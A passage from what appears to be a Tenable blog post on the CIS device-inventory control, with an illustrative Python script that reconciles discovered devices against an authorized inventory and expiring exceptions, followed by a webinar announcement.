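As an added illustration of what such an automated supporting control looks like in practice (example code, not Tenable's or CIS's), the following reconciles a list of discovered devices against the authorized inventory and the management-approved exceptions the policy defines. The inventory, the exceptions and the discovered devices are constructed sample data; keying devices on MAC address is an assumption.

```python
"""Reconcile discovered devices against an authorized-device inventory.

Added example, not Tenable's or CIS's code. The inventory, the policy exceptions
and the discovered devices are constructed; keying on MAC address is an assumption.
"""
from collections import namedtuple

# Constructed authorized inventory, keyed by MAC address.
AUTHORIZED = {
    "00:11:22:33:44:01": {"owner": "finance", "type": "laptop"},
    "00:11:22:33:44:02": {"owner": "it-ops", "type": "server"},
    "00:11:22:33:44:03": {"owner": "it-ops", "type": "switch"},
}

# Management-approved exceptions: an unmanaged device is tolerated only on the
# named VLAN and only until the expiry date (ISO dates compare correctly as strings).
EXCEPTIONS = {
    "00:11:22:33:44:99": {"vlan": "guest", "expires": "2017-06-30"},
}

Seen = namedtuple("Seen", "mac ip vlan")

# Constructed discovery results (e.g. from a discovery scan or ARP/DHCP data).
DISCOVERED = [
    Seen("00:11:22:33:44:01", "10.1.0.10", "corp"),
    Seen("00:11:22:33:44:02", "10.1.0.20", "servers"),
    Seen("00:11:22:33:44:99", "10.9.0.5", "guest"),   # covered by an exception
    Seen("00:11:22:33:44:77", "10.1.0.77", "corp"),   # never inventoried
]


def reconcile(discovered, authorized, exceptions, today):
    """Return (unauthorized, excepted, missing).

    unauthorized: seen on the network, neither inventoried nor validly excepted
    excepted:     seen, not inventoried, but inside an unexpired exception on its VLAN
    missing:      inventoried MACs that were not seen at all (stale records or outages)
    """
    unauthorized, excepted, seen = [], [], set()
    for d in discovered:
        seen.add(d.mac)
        if d.mac in authorized:
            continue
        exc = exceptions.get(d.mac)
        if exc and exc["vlan"] == d.vlan and exc["expires"] >= today:
            excepted.append(d)
        else:
            unauthorized.append(d)
    missing = sorted(set(authorized) - seen)
    return unauthorized, excepted, missing
```

Running the same reconciliation after the exception's expiry date moves the guest device into the unauthorized list, which is how a time-boxed exception stops being a permanent hole.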

More information

The CIS Critical Security Controls include six sub-controls that support Inventory of Authorized and Unauthorized Devices. A detailed discussion of these sub-controls is beyond the scope of this blog – but not to worry. Tenable is hosting a webinar on May 3rd, and we will dive into the details, show you how Tenable can help, and answer questions. This webinar is the first of a five-part series that will explore each of the CIS Foundational Cyber Hygiene controls. Brian Ventura, a SANS community instructor, will be our expert guest presenter. Brian teaches a 2-day course: Critical Security Controls: Planning, Implementing and Auditing. He has also taught a 5-day course: Implementing and Auditing the Critical Security Controls – in Depth. In addition to presenting valuable content, we will reserve time for questions and answers.

Look for future blogs where I will discuss the remaining Foundational Cyber Hygiene controls:

  • Inventory of authorized and unauthorized software
  • Secure configurations for hardware and software
  • Continuous vulnerability assessment and remediation
  • Controlled use of administrative privileges